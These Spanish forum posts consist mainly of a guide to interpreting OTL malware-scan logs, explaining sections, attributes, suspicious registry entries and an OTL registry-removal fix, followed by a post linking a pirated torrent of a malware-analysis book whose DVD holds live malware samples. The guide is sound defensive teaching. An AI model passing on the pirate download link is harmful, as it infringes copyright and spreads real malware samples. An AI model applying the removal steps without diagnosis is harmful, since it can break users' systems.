Se utilizará esta información para determinar si el escaneo es el actual, y no uno antiguo.
Segunda línea: Muestra la versión d OTL y su ubicación en el disco. El número de versión es particularmente importante. Una versión no actualizada no tendrá la funcionalidad actual y puede arrojar un resultado equivocado a la hora de evaluar un registro. De igual forma, la ubicación de OTL en el disco puede ser de gran importancia, especialmente si el mismo no se encuentra en un lugar permanente.
Tercera línea: Muestra la versión de Windows activa en el equipo, y el tipo de sistema de archivo. Esta información es muy útil para determinar si otras herramientas son compatibles con el ordenador del usuario.
Cuarta línea: Indica la versión del Explorador de Windows (Internet Explorer). La versión 8 puede causar problemas en algunos equipos.
Quinta línea: Nos muestra el país, idioma y el formato de fecha que el sistema operativo está utilizando. Puede ser útil en la preparación de las respuestas. Para obtener una lista de las siglas utilizadas clic ---> Aquí.
Sexta línea: Le indica la cantidad de memoria (RAM) que el ordenador posee. A menudo esto puede ayudar a explicar muchos de los síntomas.
Nota: El informe de la cantidad de memoria puede aparecer más baja de lo que realmente está en la máquina. Esto sucede por varias razones. El ordenador puede que no pueda acceder a toda la memoria disponible; defectos en los modulos de memoria o su base; o algo que previene al inicio del ordenador reconocer la misma. Sistemas con más de 4GB de memoria, reflejarán el máximo de 4 GB.
Líneas séptima y octava: El archivo "Pagefile.sys" es un archivo utilizado por Windows para almacenar temporalmente aquella información que se intercambia entre el sistema y la memoria física de la computadora. Así se amplía la capacidad de memoria de la computadora a través de una memoria virtual, la que no dispone de un componente tangible, sino que es creada por Windows para mejorar el funcionamiento del equipo. El tamaño del archivo fluctúa basado en la necesidad del sistema.
Novena línea: Le indica el medio ambiente del sistema; desde donde funciona la unidad del sistema, la raíz del mismo y ubicación de los archivos de programas.
Las líneas siguientes: Le indica las unidades en que el equipo está dividido, su tamaño y el espacio libre disponible. Que tipo de unidad es y si está subdividido. Puede encontrar una situación donde existe muy poco espacio libre en el disco duro (para un sistema óptimo, debe ser mayor del 15%). De ser menor, esto puede afectar la habilidad del fucionamiento de las herramientas. Si el espacio libre es muy bajo, digamos del 5%, entonces hay una posibilidad de que el ordenador no inicie cuando se ejecuta una herramienta. OTL siempre informará el estado de las unidades C: a la I, independientemente de si están o no instalados. Cualquier unidad desde la J: a la Z:, será informado solo si están presentes.

El informe continúa con un grupo de líneas que indican el nombre del equipo, el usuario actual y el nivel al cual se ha conectado. Esto nos permite saber si el usuario tiene el permiso apropiado para ejecutar una reparación.
Luego de esto, existe otro grupo de líneas que indican la configuración utilizada en el escaneo, tal y como ; el modo de arranque del ordenador; si sólo se configuró el usuario actual o todos los usuarios; escaneo en sistemas de 64-bit; si la lista de compañías reconocidas fue omitida o no; y otros.

OTL agrega anotaciones a determinadas entradas del registro:

21:52:15 | 01,216,000 | ---- | M - el último de los caracteres entre los corchechetes [.] será permanente M para indicar si el archivo fue modificado, o C para para indicar si el archivo fue creado.

Todo escaneo, excepto por los que se realizan por la edad de archivos y análisis de aquellos sin la firma de compañías reconocidas, mostrará la fecha de la última modificación de los archivos. Los dos análisis mostrarán la fecha de creación de ambos, el archivo y la carpeta. Existen tipos de infecciones que ajustan la fecha de modificación para tratar de ocultarse o mezclarse con otros archivos o carpetas. De esta manera, y mediante el análisis de las fechas de creación y modificación, podemos identificar a este tipo de infección. Si los archivos o carpetas muestran una fecha modificada en el 2003, pero fueron creados en el 2010, entonces esto es una indicación de que debemos realizar una evaluación más profunda de estos archivos. Una evaluación profunda de los resultados de escaneo nos ayudará a identificar las infecciones de forma efectiva.

18:25:02 | 1609,916,416 | -HS- | M] () -- C:hiberfil.sys -

Luego del tamaño del archivo, aparecerán los siguientes atributos son:

R - Readonly - Leer solamente
H - Hidden - Oculto
S - System - Sistema
D - Directory - Carpeta

SRV - (NMSAccessU) -- C:Program Files (x86)CDBurnerXPNMSAccessU.exe() - Esta línea indica que el archivo no está digitalmente firmado por una empresa. De estar digitalmente firmado, el nombre de la empresa aparecería dentro del paréntesis final. La mayoría de archivos maliciosos no tendrán nombre de empresa (aunque algunos sí, para ocultarse). Tenga en consideración que no todos los archivos sin nombre de empresa son malos, como muestra el ejemplo de arriba.

15:54:00 | 00,000,000 | ---D | M - Esta línea muestra un directorio (D) que se ha modificado (M) en 2009/03/10.

El tamaño de las carpetas siempre será cero según demuestra este ejemplo. Si hubiera sido un archivo, el atributo no sería una D y el tamaño del archivo normalmente sería mayor de cero, aunque también se pueden encontrar archivos con un tamaño cero. En este caso, el ejemplo es una carpeta y la fecha en que se muestra es la fecha de modificación.

Áreas de análisis estándar

RPC - procesos
MOD - módulos
SRV - servicios (O23 en HJT)
DRV - controladores
Registro estándar
IE - configuración del explorador (Internet Explorer)
FF - configuración del explorador (FireFox)
O1 a O24 - Estas líneas son similaresal registro de Hijackthis
O27 Opciones en la Ejecución de la imagen del archivo
O28 Ganchos de ejecución en la base de Windows (shell)
O29 Proveedores de seguridad
O30 Servicios de autenticación. (LSA)
O31 Modo de Inicio Seguro
032 Archivos de arranque automático en el disco
O33 Configuración de las unidades de almacenamiento
O34 Programas que se ejecutan al inicio
O35 Asociación de los archivos .com y .exe de la base del sistema
Bibliotecas (Librería) de Enlace Dinámico (.dll)
037 Asociación de los archivos .com y .exe de la base del sistema

Análisis de archivos y carpetas

Registro adicional - Se obtiene automáticamente durante el escaneo inicial de OTL. Realiza los siguientes análisis y coloca el resultado en el registro "Extras.txt". Este escaneo adicional sólo se ejecutará automáticamente la primera vez que OTL.exe se ejecute, mediante el cual se obtiene el primer análisis. Subsiguientemente, si desea ver estos resultados necesitará instruir a el usuario a que marque una de estas dos opciones: "Listado Minimo" o "Todos" en el grupo de registro adicional antes de hacer un scaneo de lo siguiente:

Asociación de archivos
Shell Spawning
Centro de Seguridad
Aplicaciones autorizadas (si se ejecuta en un sistema operativo no-Vista)
Reglas del "Firewall" en vista (si se ejecuta en un Vista o los sistemas operativos anteriores)
Lista de Programas Instalados
Vista de Sucesos (últimos 10 errores en cada área cubierta por la aplicación)

Existen dos formas de solicitarle al usuario que presente el Escaneo Estándar, "Resultado Completo" o "Resultado Mínimo". Además se puede utilizar la opción de listado minimo o "Todos" en cada uno de los escaneos standár selecionado con el grupo particular de scaneo.

Nota: Selecionando "Resultado Completo", la fecha hora del archivo se incluirán al principio de la línea, mientras que selecionando "Resultado Mínimo" sólo se incluirá el nombre del archivo, ubicación y nombre de la empresa. El resultado el escaneo concerniente a los procesos, módulos, servicios, controladores y análisis de archivos, se reflejará ordenados por fecha de archivo, sin embargo, en el caso de análisis personalizado, se ordenarán por ubicación y nombre de archivo. En los sistemas operativos de 64 bits, los elementos de 64 bits se enumerarán primero, y subsiguientemente los elementos de 32-bit dentro de la misma agrupación.

La lista de compañías reconocidas es una lista de más de 600 archivos (actualmente) de Microsoft que se consideran seguros, y que se filtrarán fuera de todos los análisis si el análisis incluyera esta opción. Al elegir la opción "Todos" en cualquier de estos análisis, se apagará el filtro y el resultado incluirá todos los achivos en el systema en el análisis.

Nota 2: Si usted va a utilizar un análisis personalizado asegúrese de que presione el botón Analizar. Si se cambia la opción de "Análisis Mínimo" se aplicará la configuración predeterminada.

También hay comandos adicionales personalizados y predefinidos que se pueden utilizar en análisis personalizados:

Nota: Con la excepción del comando HijackThisBackups, el resultado del escaneo utilizando los siguientes comandos se puede copia/pegar directamente en la sección de :OTL en una reparación para su eliminación.

HijackThisBackups - se enumeran todas las copias de apoyo producidas por Hijackthis
netsvcs - listas de entradas bajo HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionSvchost - netsvcs
msconfig - listas de entradas bajo HKEY_LOCAL_MACHINEsoftwaremicrosoftshared toolsmsconfig
safebootminimal - listas de entradas bajo HKEY_LOCAL_MACHINEsystemcurrentcontrolsetcontrolsafebootMinimal
safebootnetwork - listas de entradas bajo HKEY_LOCAL_MACHINEsystemcurrentcontrolsetcontrolsafebootNetwork
activex - listas de entradas bajo HKEY_LOCAL_MACHINEsoftwaremicrosoftactive setupinstalled components
drivers32 - listas de entradas bajo HKEY_LOCAL_MACHINEsoftwareMicrosoftWindows NTCurrentVersionDrivers32

Nota: De forma predeterminada, cada uno de los análisis predefinidos utilizará el filtro de companías reconocidas. Para anular esta acción e incluir todos los archivos en cualquiera de estos análisis debe incluir el codigo /all al final del comando (ejemplo: netsvcs /all).

Ejemplo de los resultados

Procesos

Muestra procesos que se estan ejecutando en su equipo.

========== Processes (SafeList) ==========

Estándar:
PRC - [2009/11/11 00:03:54 | 00,529,408 | ---- | M] (OldTimer Tools) -- C:OldTimer ToolsOTL.exe

Mínimo:
PRC - C:OldTimer ToolsOTL.exe (OldTimer Tools)

Módulos

========== Modules (SafeList) ==========

Estándar:
MOD - [2009/04/28 10:05:56 | 00,715,264 | ---- | M] (Agnitum Ltd.) -- c:Program FilesAgnitumOutpost Firewallwl_hook.dll

Mínimo:
MOD - c:Program FilesAgnitumOutpost Firewallwl_hook.dll (Agnitum Ltd.)

Servicios

Muestra servicios ejecutandose en el equipo.

========== Win32 Services (SafeList) ==========

Estándar:
SRV:64bit: - [2008/01/20 21:52:15 | 01,216,000 | ---- | M] (Microsoft Corporation) -- C:Program FilesWindows Media Playerwmpnetwk.exe -- (WMPNetworkSvc)
SRV - [2009/09/06 12:38:06 | 00,071,096 | ---- | M] () -- C:Program Files (x86)CDBurnerXPNMSAccessU.exe -- (NMSAccessU)

Mínimo:
SRV:64bit: - (WMPNetworkSvc) -- C:Program FilesWindows Media Playerwmpnetwk.exe (Microsoft Corporation)
SRV - (NMSAccessU) -- C:Program Files (x86)CDBurnerXPNMSAccessU.exe ()

Controladores (Drivers)

Muestra Controladores ejecutandose en el equipo. Nota: Los controladores no se muestran de forma predeterminada en un examen rápido. Se deben seleccionar y ejecutar con el botón Analizar.

========== Driver Services (SafeList) ==========

Estándar:
DRV:64bit: - [2009/02/10 16:14:00 | 00,399,384 | ---- | M] (Agnitum Ltd.) -- C:WindowsSysNativedriversafwcore.sys -- (afwcore)
DRV - [2009/09/28 20:57:28 | 00,007,168 | ---- | M] () -- C:WindowsSysWOW64driversStarOpen.sys -- (StarOpen)

Mínimo:
DRV:64bit: - (afwcore) -- C:WindowsSysNativedriversafwcore.sys (Agnitum Ltd.)
DRV - (StarOpen) -- C:WindowsSysWOW64driversStarOpen.sys ()

Registro estándar

========== Standard Registry (SafeList) ==========

Internet Explorer

========== Internet Explorer ==========

Esta sección muestra los ajustes del navegador IE Internet:

CitarIE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Default_Secondary_Page_URL = [binary data]
IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Extensions Off Page = about:NoAdd-ons
IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Local Page =
IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Security Risk Page = about:SecurityRisk
IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Start Page = http://www.microsoft.com/isapi/redir.dll?p...ER}&ar=home
IE - HKLMSOFTWAREMicrosoftInternet ExplorerSearch,CustomizeSearch = http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
IE - HKLMSOFTWAREMicrosoftInternet ExplorerSearch,CustomSearch = http://uk.red.clientapps.yahoo.com/customi...fo/bt_side.html
IE - HKLMSOFTWAREMicrosoftInternet ExplorerSearch,Default_Search_URL = http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch
IE - HKLMSOFTWAREMicrosoftInternet ExplorerSearch,SearchAssistant = http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm
IE - URLSearchHook: {18944614-1340-4483-bac9-6778840b9970} - C:Program FilesTalkTalk Mail Toolbartalktalkmailtb.dll (AOL LLC.)

IE - HKCUSOFTWAREMicrosoftInternet ExplorerMain,Default_Search_URL = http://www.google.com/ie
IE - HKCUSOFTWAREMicrosoftInternet ExplorerMain,Local Page =
IE - HKCUSOFTWAREMicrosoftInternet ExplorerMain,Page_Transitions = 1
IE - HKCUSOFTWAREMicrosoftInternet ExplorerMain,Search Page = http://www.google.com
IE - HKCUSOFTWAREMicrosoftInternet ExplorerMain,Start Page = http://www.aol.co.uk/talktalk
IE - HKCUSOFTWAREMicrosoftInternet ExplorerSearch,Default_Search_URL = http://www.google.com/ie
IE - HKCUSOFTWAREMicrosoftInternet ExplorerSearch,SearchAssistant = http://www.google.com/ie
IE - URLSearchHook: {18944614-1340-4483-bac9-6778840b9970} - C:Program FilesTalkTalk Mail Toolbartalktalkmailtb.dll (AOL LLC.)
IE - HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings: "ProxyEnable" = 0
IE - HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings: "ProxyOverride" = *.local
IE - HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings: "ProxyServer" = 0.0.0.0:80

En cuanto a algunos artículos en el ejemplo anterior podemos ver:

IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
MSN, página por defecto principal de IE.

IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
Bing, Motor de búsqueda principal de IE por defecto.

IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Extensions Off Page = about:NoAdd-ons
Una de las características menos conocidas de Internet Explorer 7 es el modo de la opcion de "No Add Ons" . Esta página se utiliza cuando el modo de No Add Ons está en funcionamiento.

IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Local Page =
página local está en blanco. Otro ajuste similar es =C:WINDOWSSystem32blank.htm.

IE - HKLMSOFTWAREMicrosoftInternet ExplorerMain,Security Risk Page = about:SecurityRisk
Informa al usuario de no navegar con la configuración de seguridad actual, ya que pueden ser perjudiciales para el equipo. Ver aquí para una lista común sobre: direcciones.

IE - HKLMSOFTWAREMicrosoftInternet ExplorerSearch,CustomSearch = http://uk.red.clientapps.yahoo.com/customi...fo/bt_side.html

Página web de Yahoo
BHO relacionados con Yahoo.

IE - HKCUSOFTWAREMicrosoftInternet ExplorerMain,Start Page = http://www.aol.co.uk/talktalk

Indica la página de inicio predeterminada..

IE - HKCUSOFTWAREMicrosoftInternet ExplorerMain,Search Page = http://www.google.com
Google se establece como una página de búsqueda principal.

IE - HKCUSOFTWAREMicrosoftInternet ExplorerSearch,Default_Search_URL = http://www.google.com/ie
ndica el conjunto de Google.com/ie como un motor de búsqueda predeterminado.

Proxy /Configuración settings.

IE - HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings: "ProxyEnable" = 0
= 0 indica que el servidor proxy está inhabilitado (ajustar el valor de 'ProxyEnable "igual a" 1 "para el proxy habilitado o '0 'para inabilitado).

IE - HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings: "ProxyOverride" = *.local
indica que Internet Explorer no va a usar el proxy para todas las direcciones de red interna.

IE - HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings: "ProxyServer" = 0.0.0.0:80
No es una IP regular pero 0.0.0.0 significa "cada IP que proporciona el equipo". Escucha en el loopback (127.0.0.1), así como la dirección de red interna. Muchas aplicaciones de AV crean un servidor de proxy para filtrar las salidas de correos..

Firefox:

========== FireFox ==========

Esta área muestra los ajustes del navegador Firefox a Internet.

CitarFF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}:6.0.07
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA}:6.0.12
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}:6.0.13
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}:6.0.14
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA}:6.0.15
FF - prefs.js..extensions.enabledItems: jqs@sun.com:1.0
FF - prefs.js..extensions.enabledItems: {20a82645-c095-46ed-80e3-08825760534b}:1.1
FF - prefs.js..extensions.enabledItems: {ABDE892B-13A8-4d1b-88E6-365A6E755758}:1.0
FF - prefs.js..extensions.enabledItems: {B13721C7-F507-4982-B2E5-502A71474FED}:2.2.0.102
FF - prefs.js..extensions.enabledItems: {972ce4c6-7e08-4474-a285-3208198ce6fd}:3.0.14
FF - prefs.js..network.proxy.no_proxies_on: "localhost"

FF - HKLMsoftwaremozillaFirefoxExtensions{20a82645-c095-46ed-80e3-08825760534b}: c:WINDOWSMicrosoft.NETFrameworkv3.5Windows Presentation FoundationDotNetAssistantExtension [2009/06/23 22:50:00 | 00,000,000 | ---D | M]
FF - HKLMsoftwaremozillaFirefoxExtensionsjqs@sun.com: C:Program FilesJavajre6libdeployjqsff [2009/03/10 15:54:00 | 00,000,000 | ---D | M]
FF - HKLMsoftwaremozillaFirefoxExtensions{ABDE892B-13A8-4d1b-88E6-365A6E755758}: c:program filesrealrealplayerbrowserrecordfirefoxext [2009/09/06 17:41:17 | 00,000,000 | ---D | M]
FF - HKLMsoftwaremozillaMozilla Firefox 3.0.14extensionsComponents: C:Program FilesMozilla Firefoxcomponents [2009/09/23 09:12:35 | 00,000,000 | ---D | M]
FF - HKLMsoftwaremozillaMozilla Firefox 3.0.14extensionsPlugins: C:Program FilesMozilla Firefoxplugins [2009/09/23 09:12:35 | 00,000,000 | ---D | M]
FF - HKLMsoftwaremozillaNetscape Browser 8.0.3.4ExtensionsComponents: C:Program FilesNetscapeNetscape BrowserComponents [2009/09/23 09:12:35 | 00,000,000 | ---D | M]
FF - HKLMsoftwaremozillaNetscape Browser 8.0.3.4ExtensionsPlugins: C:Program FilesNetscapeNetscape BrowserPlugins [2009/09/23 09:12:34 | 00,000,000 | ---D | M]

Tomando algunos elementos en el ejemplo anterior podemos ver:
.

FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}:6.0.07
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA}:6.0.12
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}:6.0.13
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}:6.0.14
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA}:6.0.15

estos están relacionados con la Consola de Sun Java
.

FF - prefs.js..extensions.enabledItems: jqs@sun.com:1.0

es un complemento para inicio rápido de Java
.
FF - prefs.js..extensions.enabledItems: {20a82645-c095-46ed-80e3-08825760534b}:1.1

Asistente de Microsoft .NET Framework para Firefox
.
FF - prefs.js..extensions.enabledItems: {ABDE892B-13A8-4d1b-88E6-365A6E755758}:1.0
Real Player
.
FF - prefs.js..extensions.enabledItems: {B13721C7-F507-4982-B2E5-502A71474FED}:2.2.0.102
Skype
.

O1 hasta e incluyendo O22 O24

Esta lista es muy similar a un registro de HijackThis y la referencia a HijackThis Tutorial & Guia se recomienda para artículos 01 a través de 020 y también el tema 024.

010 Esto requiere una explicación adicional: a diferencia de HijackThis, OTL eliminará las entradas de catálogo que se incluyen en la reparación y a continuación, reordena la pila de winsock por lo que no habrá un eslabón roto de la cadena LSP, es decir, usted puede utilizar OTL para corregir estos elementos.

Opciones de Ejecución de una imagen de archivo O27

Elementos de listas bajo Opciones de ejecución de archivos de HKey_Local_MachineSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options

Explicación aquí.

O28 Hooks de ejecución en shell

HKey_Local_MachineSOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks

Estos se cargan cada vez que inicie un programa (mediante el Explorador de Windows o por llamar a la función de ShellExecute(Ex)). Este módulo de inicio como los otros módulos DLL de inicio es notificado del programa que usted inicia y que puede realizar cualquier tarea adicional antes que el programa en realidad inicie.

O29 proveedores de seguridad

Listas de elementos bajo HKey_Local_MachineSYSTEMCurrentControlSetControlSecurityProvidersSecurityProviders

O29 - HKLM SecurityProviders - (xlibgfl254.dll) - .Trashes [2008/11/03 13:08:10 | 00,000,000 | -H-D | M]
O29 - HKLM SecurityProviders - (digiwet.dll) - File not found

Estos son ejemplos de los malos. Tenga mucho cuidado! porque elementos legítimos se muestra aquí también.

O30 Lsa

Listas de elementos bajo HKEY_LOCAL_MACHINEsystemcurrentcontrolsetcontrollsa

O30 - LSA: Authentication Packages - (C:WINDOWSsystem32opnnLbaA.dll) - C:WINDOWSSystem32opnnLbaA.dll File not found

Lo anterior es un ejemplo de una mala.

Nota: Los elementos LSA 32 bits comparados a 64 bits:

O30:64bit: - LSA: Authentication Packages - (msv1_0) - C:WindowsSysNativemsv1_0.dll (Microsoft Corporation)
O30 - LSA: Authentication Packages - (msv1_0) - C:WindowsSysWow64msv1_0.dll (Microsoft Corporation)
O30:64bit: - LSA: Security Packages - (kerberos) - C:WindowsSysNativekerberos.dll (Microsoft Corporation)
O30:64bit: - LSA: Security Packages - (msv1_0) - C:WindowsSysNativemsv1_0.dll (Microsoft Corporation)
O30:64bit: - LSA: Security Packages - (schannel) - C:WindowsSysNativeschannel.dll (Microsoft Corporation)
O30:64bit: - LSA: Security Packages - (wdigest) - C:WindowsSysNativewdigest.dll (Microsoft Corporation)
O30:64bit: - LSA: Security Packages - (tspkg) - C:WindowsSysNativetspkg.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (kerberos) - C:WindowsSysWow64kerberos.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (msv1_0) - C:WindowsSysWow64msv1_0.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (schannel) - C:WindowsSysWow64schannel.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (wdigest) - C:WindowsSysWow64wdigest.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (tspkg) - C:WindowsSysWow64tspkg.dll (Microsoft Corporation)

Para los elementos que se encuentran en la rama de HKLMSystem del registro, hay sólo un valor, pero será interpretado de forma diferente por aplicaciones de 32 bits y aplicaciones de 64 bits. En los ejemplos anteriores se puede ver que las interpretaciones de 64 bits se verá a los archivos en la carpeta Sysnative (las carpetas system32 de 64 bits) y las interpretaciones de 32 bits se verá en la carpeta syswow64 (la carpeta system32 de 32 bits). Si elimina cualquiera de estos elementos afectará a las operaciones tanto de 32 bits y de 64 bits. Eliminación de una o de las otras líneas parecidas se elimina el elemento de la ubicación del registro único pero sólo se movera el archivo de la línea seleccionada. A continuación si desea quitar ambos archivos para la coincidencia de elementos parecidos como estas, entonces incluya las dos en la reparación. Es importante comprender donde están ubicados los elementos en el registro para determinar si un elemento de registro único es leído por las aplicaciones de 32 bits y de 64 bits. Lo que usted podría encontrar en una situación como ésta es que el archivo apuntado por la interpretación de 32 bits es malo, pero la interpretación de 64 bits está muy bien (la mayoría de malware sólo afecta a aplicaciones de 32 bits debido a que el sistema operativo de 64 bits no permite cambios en sus archivos). Dado que el valor del registro es compartido por ambos no desea eliminarlo debido a que podría causar problemas en el sistema.

Ahora tome este ejemplo de los elementos LSA anteriores:

O30:64bit: - LSA: Authentication Packages - (msv1_0) - C:WindowsSysNativemsv1_0.dll (Microsoft Corporation)
O30 - LSA: Authentication Packages - (msv1_0) - C:WindowsSysWow64msv1_0.dll ()
O30:64bit: - LSA: Security Packages - (kerberos) - C:WindowsSysNativekerberos.dll (Microsoft Corporation)
O30:64bit: - LSA: Security Packages - (msv1_0) - C:WindowsSysNativemsv1_0.dll (Microsoft Corporation)
O30:64bit: - LSA: Security Packages - (schannel) - C:WindowsSysNativeschannel.dll (Microsoft Corporation)
O30:64bit: - LSA: Security Packages - (wdigest) - C:WindowsSysNativewdigest.dll (Microsoft Corporation)
O30:64bit: - LSA: Security Packages - (tspkg) - C:WindowsSysNativetspkg.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (kerberos) - C:WindowsSysWow64kerberos.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (msv1_0) - C:WindowsSysWow64msv1_0.dll ()
O30 - LSA: Security Packages - (schannel) - C:WindowsSysWow64schannel.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (wdigest) - C:WindowsSysWow64wdigest.dll (Microsoft Corporation)
O30 - LSA: Security Packages - (tspkg) - C:WindowsSysWow64tspkg.dll (Microsoft Corporation)

En este ejemplo se puede ver que se ha comprometido el archivo msv1_0.dll para la interpretación de 32 bits. Debería ser un archivo de Microsoft, pero en este caso ha sido sustituido por un archivo desconocido. En esta situación usted desea eliminar sólo el archivo de C:WindowsSysWow64msv1_0.dll pero NO la entrada del Registro. También habría que sustituir el Msv1_0.dll malo con uno válido, ya que se requiere para soporte de aplicaciones.

O31 Modo Seguro a prueba de fallos (SafeBoot)

Listas de elementos bajo HKEY_LOCAL_MACHINEsystemcurrentcontrolsetSafeBoot

Archivos de O32 Autorun en las unidades

Acceso a un dispositivo removible infectado, como una thumb drive o unidad flash a través de "Mi PC" (al hacer clic en la unidad) hará que un autorun.inf se ejecute.

Dependiendo de la ejecución automática /configuración de reproducción automática, entonces, el usuario puede ser engañado en ejecutar un archivo incorrecto, cuando le aparece un diálogo en la inserción Haciendo clic en un icono en el "usar este programa para ejecutar" un programa no legítimo agrega al archivo autorun.inf en esa unidad que se puede ejecutar.

Algunos malware agrega archivos autorun.inf en la raíz de todas las unidades lógicas.

O33 MountPoints2

Listas de elementos bajo HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerMountPoints2

O34 BootExecute

Listas de elementos bajo HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager

O35 shell spawning values

En la base de windows en la listas de valores para .com y .exe configuración del registro (no otras extensiones).

Elementos de O35 (como cualquier otro elemento en el análisis de registro) simplemente se pueden colocar en la sección de :OTL, de una reparación, (en los del registro de Extras no puede).

Con la infecion de Win police Pro se verá un nombre de archivo en lugar de la "% 1" % *. Si lo ves, entonces incluir estas líneas en la reparación.

O36 appcert dlls

Lista de elementos bajo HKEY_LOCAL_MACHINEsystemcurrentcontrolsetcontrolsession managerappcertdlls key

Asociaciones de archivos de O37 (para valores comfile y exefile )

Listas de archivo de asociaciones de valores para la configuración del registro de .com y .exe de la base de windows.

Las asociaciones de archivos en la base de windows están íntimamente entrelazadas. Los elementos de O35 muestran los valores de la base de windows (.com y .exe) y los elementos de O37 muestran las asociaciones de archivo (.com y .exe).

Puede ver estos valores si se ejecuta el análisis de registro extra, pero cuando no puede verlos entonces estos valores pueden estar ocultos. La línea de O37 le ofrece la capacidad para ver esto incluso cuando no se ejecuta el análisis de registro adicional.

El valor de la Asociación de archivo es un valor predeterminado único que apuntará al valor de la base de windows. Es el valor de la base de windows donde se pueden configurar ejecutables adicionales para ejecutar tipos de archivo específicos a través de la asociación. Por ejemplo la Asociación de archivos del usuario para los archivos .exe debe estar apuntando a .exe pero el malware puede cambiarlo para que apunte a una nueva clave de desove que está cargando un "archivo malo". El archivo debe aparecer en los análisis de archivo, pero sólo mover ese archivo y no fijar el valor de la Asociación creará una situación donde no se pueden ejecutar archivos .exe.

Cuando ponga elementos para eliminación aquí, OTL establecerá a cualquier usuario .com HKLM o configuración de asociación de archivo .exe de vuelta a los valores predeterminados, pero elimina .com con cualquier usuario o las claves de asociación de archivos .exe y siempre establece el shell HKLM desove de configuración a la normalidad.

Nota: Si la clave de desove está en la rama del usuario del registro, a continuación, siempre se eliminará automáticamente, pero que necesitará quitar el archivo por separado. El archivo debe aparecer en los análisis de archivo y usted puede hacerse cargo de allí. Si la clave de desove aparece con el error de Reg: error de clave y es el malware y, a continuación, también debe incluir una línea en la sección :REG para eliminarlo de la sección HKLM sólo por seguridad.

Ejemplo de la eliminación de un valor incorrecto de la sección HKLM.

:reg
[-hkey_local_machinesoftwareclasses"badfile"]

y tenga cuidado del archivo desde los análisis de archivo o de la sección :Files

Actualizado: 05.01.2015

#354

Análisis y Diseño de Malware / Malware Analyst´s Cookbook and DVD

31 Julio 2012, 14:06 PM

TOOLS AND TECHNIQUES FOR FIGHTING MALICIOUS CODE

Consejos prácticos que los autores han previsto para la comprensión y la lucha contra el malware. El libro no hace una mezcla de todos los conocimientos existentes sobre el tema, pero presenta numerosas herramientas y enfoques originales. El DVD que viene con el texto ofrece un montón de secuencias de comandos útiles y herramientas no disponibles en ningún otro lugar.

Adverténcia: El archivo que descargas con el DVD contiene ejemplos prácticos con malware real. Aunque todo viene explicado hay que tener ojo con los ejecutables infectados a manipular!!!

Titulo: Malware Analysts Cookbook and DVD:

PDF: http://lh.rs/drpcMJptEIm5
PDF y DVD: http://thepiratebay.se/torrent/6851543/

Más información:
http://www.malwarecookbook.com/
http://www.malwarecookbook.com/?p=119

#355

Seguridad / Evitar que se instalen barras de navegación de terceros al instalar programas.

22 Julio 2012, 10:18 AM

Uno de los muchos problemas con los que me he encontrado al echarle un vistazo a equipos de amigos y familiares es que al abrir cualquier navegador tienen entre 3 y 5 barras de navegación que se añaden como plugin al instalar algunos programas.
Para el ejemplo utilizaré el downloader de Softonic, el cual descarga el programa y al lanzarlo nos muestra una guía paso a paso en la que nos dan la opción de añadir un complemento para el/los navegador/es. Por supuesto hay otros muchos programas que utilizan la misma técnica, es simplemente publicidad que recibiremos, de algun lado tendrán que sacar beneficios, pobrecitos!!!

Os pongo el ejemplo de mis primos, donde al instalar un programa, si viene en español apenas leen, solo dan a siguiente, siguiente hasta finalizar la instalación, si viene en ingles pues next, next sin leer nada hasta exit (mis primos no son una excepción ehh)...

